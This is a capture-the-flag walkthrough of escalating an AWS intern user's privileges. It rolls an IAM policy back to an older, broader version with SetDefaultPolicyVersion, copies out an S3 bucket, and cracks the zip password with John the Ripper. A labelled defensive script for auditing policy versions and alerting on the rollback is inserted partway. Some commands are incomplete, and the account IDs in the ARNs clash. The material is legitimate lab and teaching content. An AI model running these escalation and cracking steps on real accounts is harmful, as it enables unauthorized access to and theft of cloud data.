Escalate Privileges by IAM Policy Rollback

A walkthrough demonstrating how to abuse the IAM permission: SetDefaultPolicyVersion

CTF Source: Pwned Labs


In this walkthrough, we're provided access keys for an Intern with seemingly little access, but we find a way to escalate our privileges and obtain access to sensitive data!


  • Install awscli: brew install awscli (mac) or apt install awscli (linux)

  • Install JohnTheRipper: brew install john (mac) or apt install john (linux)


After configuring our AWS access keys (aws configure), let's begin to enumerate our access.

This command tells us who we are.

aws sts get-caller-identity
{
    "Account": "831057696777",
    "Arn": "arn:aws:iam::831057696777:user/intern01"
}

We can then list policies attached to this user.

aws iam list-attached-user-policies --user-name intern01
{
    "AttachedPolicies": [
        {
            "PolicyName": "intern_policy",
            "PolicyArn": "arn:aws:iam::214768663777:policy/intern_policy"
        }
    ]
}

Let's see if we have multiple versions of this policy.

aws iam list-policy-versions --policy-arn arn:aws:iam::214768663777:policy/intern_policy
{
    "Versions": [
        {
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2024-03-14T23:00:42+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2024-03-14T23:00:41+00:00"
        }
    ]
}

We can view each version with aws iam get-policy-version --policy-arn arn:aws:iam::214768663777:policy/intern_policy --version-id v1 (or v2). Note that the non-default v1 is still readable even though it is not in effect.

aws iam get-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [ ... ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2024-03-14T21:43:51+00:00"
    }
}

Escalating Privileges

The v1 policy grants additional S3 permissions over all resources ("Resource": "*"). We'll make v1 the default version of the policy. This edits no policy document at all; it only switches which already-existing version is in effect, which is why a lone iam:SetDefaultPolicyVersion permission is enough.

aws iam set-default-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1
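The exposure behind this step is a non-default policy version that allows more than the default one does, plus any principal that can call SetDefaultPolicyVersion on it. The following script is an added example for this walkthrough (not code from the original page or from Pwned Labs) showing how a defender would find that exposure and spot the rollback in CloudTrail. It runs on constructed in-memory data shaped like the CLI output above; the S3 and IAM actions in the sample documents and the CloudTrail records are assumptions, and in a real account the same dicts would come from boto3's iam.list_policy_versions() / iam.get_policy_version() and from CloudTrail.

```python
"""Audit IAM managed-policy versions and flag SetDefaultPolicyVersion calls.

Added example for this walkthrough, not part of the original page. All data
below is constructed so the script runs offline.
"""
import re

# Constructed sample (assumption): two versions of intern_policy. Only the
# version ids, the default flag and the JSON shape mirror the walkthrough; the
# v2 IAM read actions and the v1 S3 actions are invented for illustration.
POLICY_VERSIONS = [
    {"VersionId": "v2", "IsDefaultVersion": True,
     "Document": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow",
          "Action": ["iam:ListPolicyVersions", "iam:GetPolicyVersion"],
          "Resource": "*"}]}},
    {"VersionId": "v1", "IsDefaultVersion": False,
     "Document": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow",
          "Action": ["s3:ListAllMyBuckets", "s3:ListBucket", "s3:GetObject"],
          "Resource": "*"}]}},
]


def allowed_actions(document):
    """Collect the Allow actions in a policy document (Action may be str or list)."""
    actions = set()
    for stmt in document.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        act = stmt.get("Action", [])
        actions.update([act] if isinstance(act, str) else act)
    return actions


def extra_grants_in_non_default_versions(versions):
    """Return {VersionId: [actions]} for every non-default version that allows
    actions the default version does not. A non-empty result is exactly the
    exposure abused in this walkthrough: holding iam:SetDefaultPolicyVersion on
    the policy yields those actions without editing any document."""
    default = next(v for v in versions if v["IsDefaultVersion"])
    baseline = allowed_actions(default["Document"])
    extras = {}
    for v in versions:
        if v["IsDefaultVersion"]:
            continue
        delta = allowed_actions(v["Document"]) - baseline
        if delta:
            extras[v["VersionId"]] = sorted(delta)
    return extras


# Constructed CloudTrail-style records (assumption): one harmless read and the
# rollback call from the walkthrough, using the ARNs shown on the page.
CLOUDTRAIL_EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "GetPolicyVersion",
     "userIdentity": {"arn": "arn:aws:iam::831057696777:user/intern01"},
     "requestParameters": {
         "policyArn": "arn:aws:iam::831057696777:policy/intern_policy",
         "versionId": "v1"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "SetDefaultPolicyVersion",
     "userIdentity": {"arn": "arn:aws:iam::831057696777:user/intern01"},
     "requestParameters": {
         "policyArn": "arn:aws:iam::831057696777:policy/intern_policy",
         "versionId": "v1"}},
]


def _version_number(version_id):
    """Parse 'v3' -> 3; unknown formats sort as -1."""
    m = re.fullmatch(r"v(\d+)", version_id or "")
    return int(m.group(1)) if m else -1


def default_version_alerts(events, current_defaults):
    """Emit one alert per SetDefaultPolicyVersion call. Such calls are rare in
    normal operation, so every one is worth reviewing; 'rollback' is True when
    the call moves the policy to an older version than the one in
    current_defaults (policyArn -> VersionId known from the last inventory)."""
    alerts = []
    for ev in events:
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        if ev.get("eventName") != "SetDefaultPolicyVersion":
            continue
        params = ev.get("requestParameters", {})
        arn = params.get("policyArn")
        new = params.get("versionId", "")
        old = current_defaults.get(arn, "")
        alerts.append({"actor": ev["userIdentity"]["arn"], "policyArn": arn,
                       "from": old, "to": new,
                       "rollback": _version_number(new) < _version_number(old)})
    return alerts


if __name__ == "__main__":
    print(extra_grants_in_non_default_versions(POLICY_VERSIONS))
    known = {"arn:aws:iam::831057696777:policy/intern_policy": "v2"}
    print(default_version_alerts(CLOUDTRAIL_EVENTS, known))
```

The first function is the preventive check: run it over every customer-managed policy and either delete stale versions that grant more than the default or treat them as findings. The second is the detective control: a SetDefaultPolicyVersion event whose actor is a principal the policy is attached to, as here, is self-escalation and deserves a high-severity alert regardless of the rollback flag.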

With the v1 permissions in effect, listing the buckets in the account reveals one, and we download its contents.

aws s3 ls    
2024-03-14 15:43:52 huge-logistics-data-8344bf3ad538
aws s3 cp s3://huge-logistics-data-8344bf3ad538/ .

download: s3://huge-logistics-data-8344bf3ad538/ to ./

Password Cracking

Unfortunately, the file is password-protected.


[] amex-export.json password:   

Not to worry as we can attempt to crack the password.

We'll extract the archive's password hash with zip2john and save it to a new file.

zip2john > hash.txt

Next, we'll use JohnTheRipper and the classic rockyou.txt password list.

john hash.txt --wordlist=rockyou.txt

1logistics       (  

Finding the Flag!

We found the password! Unzipping the archive with it reveals the flag.

unzip -P 1logistics 

  inflating: amex-export.json        
 extracting: flag.txt  

Get the final flag.

cat flag.txt      
